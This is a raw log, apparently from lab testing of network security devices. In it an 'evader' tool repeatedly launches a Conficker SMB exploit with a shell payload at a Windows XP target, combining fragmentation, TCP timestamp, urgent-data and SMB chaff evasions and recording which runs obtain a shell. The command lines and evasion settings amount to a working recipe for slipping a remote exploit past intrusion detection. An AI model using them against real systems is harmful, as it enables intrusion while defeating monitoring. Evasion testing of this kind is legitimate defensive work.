- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18364 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=0UFzFvAvo1k --evasion=[smb_connect,end]tcp_paws,"5","268435455","shuffle" --evasion=[smb_opentree,end]tcp_paws,"1","7","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 0UFzFvAvo1n
- The following evasions are applied from stage smb_connect to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has shuffled original payload
- The following evasions are applied from stage smb_opentree to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.116:18364 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 4118 runs averaging 1.90 runs / second ; progress: 2167/43200.........
- 4127 runs averaging 1.90 runs / second ; progress: 2172/43200..............
- 4141 runs averaging 1.90 runs / second ; progress: 2178/43200..Pid 28876 timed out - killed
- 2015-06-07 23:55:48 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50364 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=Qd7YC0/440M --evasion=[start,netbios_connect]ipv4_opt,"2","inc","zero" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed Qd7YC0/440N
- The following evasions are applied from stage start to netbios_connect:
- - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has NULL bytes for payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Add a random alphaurgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.117:50364 -> 10.35.1.207:445
- Terminated
- ........Pid 28942 timed out - killed
- 2015-06-07 23:55:51 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57424 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=C0OcLkrMnfY --evasion=[start,end]ipv4_frag,"56" --evasion=[msrpc_bind,end]tcp_overlap,"717","new","zero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed C0OcLkrMnfY
- - IPv4 fragments with at most 56 bytes per fragment
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random alphanumeric urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - TCP segments are set to overlap by 717 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.111:57424 -> 10.35.1.207:445
- Terminated
- .
- 4154 runs averaging 1.90 runs / second ; progress: 2183/43200...........
- 4165 runs averaging 1.90 runs / second ; progress: 2188/43200.2015-06-07 23:55:58 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61300 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=IvJxSTiwIlk --evasion=[msrpc_bind,end]ipv4_opt,"1","inc","shuffletcp" --evasion=[smb_connect,end]tcp_paws,"75%","268435453","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed IvJxSTiwIlk
- The following evasions are applied from stage smb_connect to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has shuffled original payload
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled TCP payload
- Info: NetBIOS connection 10.62.90.111:61300 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ........
- 4175 runs averaging 1.90 runs / second ; progress: 2193/43200.................
- 4192 runs averaging 1.91 runs / second ; progress: 2198/43200.....................
- 4213 runs averaging 1.91 runs / second ; progress: 2203/43200.........
- 4222 runs averaging 1.91 runs / second ; progress: 2208/43200.....
- 4227 runs averaging 1.91 runs / second ; progress: 2213/43200..2015-06-07 23:56:24 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=21077 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=r+UXSHT7fyw --evasion=[smb_connect,msrpc_bind]smb_chaff,"5","write_flag","zero" --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"7","7","8","random_msrpcbind" --verifydelay=1000 --payload=shell
- Info: Using random seed r+UXSHT7fyy
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Before every 5th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Before normal SMB writes, 7 SMB trees are opened and 7 writes are performed to them. The write payload is 8 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.116:21077 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ........
- 4238 runs averaging 1.91 runs / second ; progress: 2218/43200.....
- 4243 runs averaging 1.91 runs / second ; progress: 2223/43200...........
- 4254 runs averaging 1.91 runs / second ; progress: 2228/43200.....
- 4259 runs averaging 1.91 runs / second ; progress: 2233/43200..................
- 4277 runs averaging 1.91 runs / second ; progress: 2238/43200...............
- 4292 runs averaging 1.91 runs / second ; progress: 2243/43200..........
- 4302 runs averaging 1.91 runs / second ; progress: 2248/43200...........
- 4313 runs averaging 1.91 runs / second ; progress: 2253/43200.............
- 4326 runs averaging 1.92 runs / second ; progress: 2258/43200................
- 4342 runs averaging 1.92 runs / second ; progress: 2263/43200.......
- 4349 runs averaging 1.92 runs / second ; progress: 2268/43200....
- 4353 runs averaging 1.92 runs / second ; progress: 2273/43200.........
- 4362 runs averaging 1.91 runs / second ; progress: 2278/43200........
- 4370 runs averaging 1.91 runs / second ; progress: 2283/432002015-06-07 23:57:33 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55850 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=XzJN6u3j/GI --evasion=[start,smb_openpipe]ipv4_frag,"1464" --evasion=[start,smb_connect]ipv4_order,"lastfirst" --evasion=[netbios_connect,end]tcp_paws,"3","8","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed XzJN6u3j/GJ
- The following evasions are applied from stage start to smb_openpipe:
- - IPv4 fragments with at most 1464 bytes per fragment
- The following evasions are applied from stage start to smb_connect:
- - IPv4 fragments are sent in correct order except that the last fragment comes first
- The following evasions are applied from stage netbios_connect to end:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.115:55850 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 4372 runs averaging 1.91 runs / second ; progress: 2288/43200
- 4372 runs averaging 1.91 runs / second ; progress: 2293/43200..
- 4374 runs averaging 1.90 runs / second ; progress: 2298/43200.........
- 4383 runs averaging 1.90 runs / second ; progress: 2303/43200Pid 30126 timed out - killed
- 2015-06-07 23:57:54 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=32027 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=wUBn/BV2FEU --evasion=[smb_connect,end]smb_chaff,"21","write_flag","zero" --evasion=[start,smb_connect]tcp_paws,"21","120695731","random_alphanum" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed wUBn/BV2FEX
- The following evasions are applied from stage start to smb_connect:
- - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 120695731> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to end:
- - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 75% probability to add a random urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.110:32027 -> 10.35.1.207:445
- Terminated
- .....
- 4389 runs averaging 1.90 runs / second ; progress: 2308/43200....
- 4393 runs averaging 1.90 runs / second ; progress: 2313/43200......
- 4399 runs averaging 1.90 runs / second ; progress: 2318/43200.........
- 4408 runs averaging 1.90 runs / second ; progress: 2323/43200....2015-06-07 23:58:17 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34566 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Hhd5F+J7AnY --evasion=[smb_opentree,msrpc_bind]ipv4_frag,"832" --evasion=[msrpc_bind,end]smb_decoytrees,"6","1","7","random_msrpcreq" --verifydelay=1000 --payload=shell
- Info: Using random seed Hhd5F+J7AnY
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - IPv4 fragments with at most 832 bytes per fragment
- The following evasions are applied from stage msrpc_bind to end:
- - Before normal SMB writes, 6 SMB trees are opened and 1 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.116:34566 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ..
- 4415 runs averaging 1.90 runs / second ; progress: 2328/43200.......
- 4422 runs averaging 1.90 runs / second ; progress: 2333/43200..........
- 4432 runs averaging 1.90 runs / second ; progress: 2338/43200............
- 4444 runs averaging 1.90 runs / second ; progress: 2343/43200.........
- 4453 runs averaging 1.90 runs / second ; progress: 2348/43200..........
- 4463 runs averaging 1.90 runs / second ; progress: 2353/43200.......Pid 31109 timed out - killed
- 2015-06-07 23:58:47 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37344 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=FvSgjVWqTCk --evasion=[netbios_connect,smb_openpipe]ipv4_frag,"48" --evasion=[netbios_connect,smb_openpipe]tcp_paws,"25%","6","shuffle" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed FvSgjVWqTCk
- The following evasions are applied from stage netbios_connect to smb_openpipe:
- - IPv4 fragments with at most 48 bytes per fragment
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has shuffled original payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a random alphaurgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.113:37344 -> 10.35.1.207:445
- Terminated
- .......
- 4478 runs averaging 1.90 runs / second ; progress: 2358/43200......Pid 31179 timed out - killed
- 2015-06-07 23:58:50 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19295 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=Kz3v1sEnRX8 --evasion=[smb_connect,msrpc_req]tcp_segvar,"6","62790" --evasion=[smb_opentree,end]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed Kz3v1sEnRX8
- The following evasions are applied from stage smb_connect to msrpc_req:
- - TCP packets are segmented to contain between 6 and 62790 bytes of payload.
- The following evasions are applied from stage smb_opentree to end:
- - Add a random alphanumeric urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.119:19295 -> 10.35.1.207:445
- Terminated
- ..................
- 4503 runs averaging 1.91 runs / second ; progress: 2363/43200............
- 4515 runs averaging 1.91 runs / second ; progress: 2369/43200......
- 4521 runs averaging 1.90 runs / second ; progress: 2374/43200......
- 4527 runs averaging 1.90 runs / second ; progress: 2379/43200.............2015-06-07 23:59:12 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30148 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=jbJwefC+liw --evasion=[netbios_connect,smb_connect]ipv4_opt,"3","inc","shuffletcp" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"50%","8","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed jbJwefC+liy
- The following evasions are applied from stage netbios_connect to smb_connect:
- - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled TCP payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.110:30148 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 4544 runs averaging 1.91 runs / second ; progress: 2384/43200........2015-06-07 23:59:17 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63960 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=j+EzmmWE6BM --evasion=[smb_opentree,end]tcp_paws,"25%","9","random" --evasion=[msrpc_bind,msrpc_req]tcp_urgent,"13","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed j+EzmmWE6BO
- The following evasions are applied from stage smb_opentree to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Add a random alphaurgent data byte to every 13 TCP segment.
- Info: NetBIOS connection 10.62.90.113:63960 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....
- 4557 runs averaging 1.91 runs / second ; progress: 2389/43200.........
- 4566 runs averaging 1.91 runs / second ; progress: 2394/43200.................
- 4583 runs averaging 1.91 runs / second ; progress: 2399/432002015-06-07 23:59:29 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18737 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=o6dhAFDy5Zs --evasion=[smb_connect,end]smb_decoytrees,"5","6","2","random_msrpcreq" --evasion=[start,end]tcp_inittsopt,"enable","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed o6dhAFDy5Zu
- - TCP timestamps enabled, initial TCP timestamp is set to normal ( ie. taken from the timestamp clock ).
- The following evasions are applied from stage smb_connect to end:
- - Before normal SMB writes, 5 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.115:18737 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ................
- 4600 runs averaging 1.91 runs / second ; progress: 2404/43200.........
- 4609 runs averaging 1.91 runs / second ; progress: 2409/43200.
- 4610 runs averaging 1.91 runs / second ; progress: 2414/43200.2015-06-07 23:59:45 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23455 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=FVDJtPsNgvo --evasion=[start,smb_openpipe]tcp_chaff,"1","chksum|nullflag|outofwindow|shorthdr","random_alpha" --evasion=[start,end]tcp_paws,"50%","6","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed FVDJtPsNgvo
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage start to smb_openpipe:
- - With every 1 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * Duplicate packet has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.115:23455 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 4618 runs averaging 1.91 runs / second ; progress: 2419/43200......
- 4624 runs averaging 1.91 runs / second ; progress: 2424/432002015-06-07 23:59:54 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62608 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=jagl4e+Cocw --evasion=[netbios_connect,end]ipv4_frag,"48" --evasion=[start,msrpc_bind]ipv4_order,"rand" --evasion=[smb_openpipe,end]tcp_paws,"1","7","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed jagl4e+Cocy
- The following evasions are applied from stage start to msrpc_bind:
- - IPv4 fragments are sent in a random order
- The following evasions are applied from stage netbios_connect to end:
- - IPv4 fragments with at most 48 bytes per fragment
- The following evasions are applied from stage smb_openpipe to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.110:62608 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..........
- 4635 runs averaging 1.91 runs / second ; progress: 2429/43200..........
- 4645 runs averaging 1.91 runs / second ; progress: 2434/43200.Pid 32240 timed out - killed
- 2015-06-08 00:00:04 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47969 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=tp+FrT9yypg --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"1408" --evasion=[smb_connect,end]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed tp+FrT9yypi
- The following evasions are applied from stage smb_connect to end:
- - 25% probability to add a random alphaurgent data byte to a TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - IPv4 fragments with at most 1408 bytes per fragment
- Info: NetBIOS connection 10.62.90.118:47969 -> 10.35.1.207:445
- Terminated
- ................
- 4663 runs averaging 1.91 runs / second ; progress: 2439/43200..........
- 4673 runs averaging 1.91 runs / second ; progress: 2444/43200.........
- 4682 runs averaging 1.91 runs / second ; progress: 2449/43200...........Pid 32520 timed out - killed
- 2015-06-08 00:00:24 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40937 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=2UySA8bJYfo --evasion=[netbios_connect,smb_openpipe]tcp_chaff,"75%","nullchksum|nullflag|shorthdr|longhdr","alphanumrandomized" --evasion=[smb_opentree,end]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed 2UySA8bJYfr
- The following evasions are applied from stage netbios_connect to smb_openpipe:
- - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * NULL TCP checksum.
- * NULL TCP control flags.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to end:
- - Add a random alphanumeric urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.114:40937 -> 10.35.1.207:445
- Terminated
- 4694 runs averaging 1.91 runs / second ; progress: 2454/43200........................
- 4718 runs averaging 1.92 runs / second ; progress: 2459/43200......2015-06-08 00:00:31 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33922 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=ftL7lBQo1h0 --evasion=[smb_connect,smb_opentree]smb_decoytrees,"2","4","652","random" --evasion=[smb_opentree,msrpc_bind]smb_decoytrees,"4","3","2047","random" --evasion=[start,end]tcp_paws,"75%","268435453","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed ftL7lBQo1h1
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to smb_opentree:
- - Before normal SMB writes, 2 SMB trees are opened and 4 writes are performed to them. The write payload is 652 random bytes.
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 2047 random bytes.
- Info: NetBIOS connection 10.62.90.113:33922 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........
- 4736 runs averaging 1.92 runs / second ; progress: 2464/43200........2015-06-08 00:00:37 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15508 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=UyQ9/Q7tcpQ --evasion=[smb_opentree,msrpc_req]ipv4_opt,"2","inc","unmodified" --evasion=[msrpc_bind,msrpc_req]smb_writeandxpad,"219","random_alphanum" --evasion=[smb_connect,msrpc_req]tcp_paws,"1","72760242","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed UyQ9/Q7tcpR
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 72760242> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 219 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
- Info: NetBIOS connection 10.62.90.110:15508 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 4748 runs averaging 1.92 runs / second ; progress: 2469/43200...........
- 4759 runs averaging 1.92 runs / second ; progress: 2474/432002015-06-08 00:00:45 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19812 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=APidMQF+mvg --evasion=[msrpc_bind,msrpc_req]smb_chaff,"50%","write_flag","rand" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","159953442","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed APidMQF+mvg
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 159953442> and has shuffled original payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 50% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
- Info: NetBIOS connection 10.62.90.115:19812 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .Pid 487 timed out - killed
- 2015-06-08 00:00:47 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49214 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=YuEkRjb1/QI --evasion=[msrpc_req,end]smb_fnameobf,"add_null_trailer" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed YuEkRjb1/QJ
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a random alphanumeric urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - The SMB filename is obfuscated:
- * A 0x00 and random alphanumeric characters are appended to the filename
- Info: NetBIOS connection 10.62.90.112:49214 -> 10.35.1.207:445
- Terminated
- ......
- 4768 runs averaging 1.92 runs / second ; progress: 2479/43200......................
- 4790 runs averaging 1.93 runs / second ; progress: 2484/43200.......2015-06-08 00:00:57 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33279 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=/95Xlpf3RsE --evasion=[smb_connect,msrpc_req]tcp_paws,"1","221380699","alphanumrandomized" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"3","225560803","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed /95Xlpf3RsH
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 221380699> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 225560803> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.119:33279 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 4804 runs averaging 1.93 runs / second ; progress: 2489/43200..2015-06-08 00:01:00 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31556 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=6iwHnnxwOcY --evasion=[smb_openpipe,end]netbios_chaff,"75%","empty_unspec|empty_keepalive|http_get|broken_length" --evasion=[msrpc_req,end]tcp_paws,"1","268435454","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed 6iwHnnxwOcb
- The following evasions are applied from stage smb_openpipe to end:
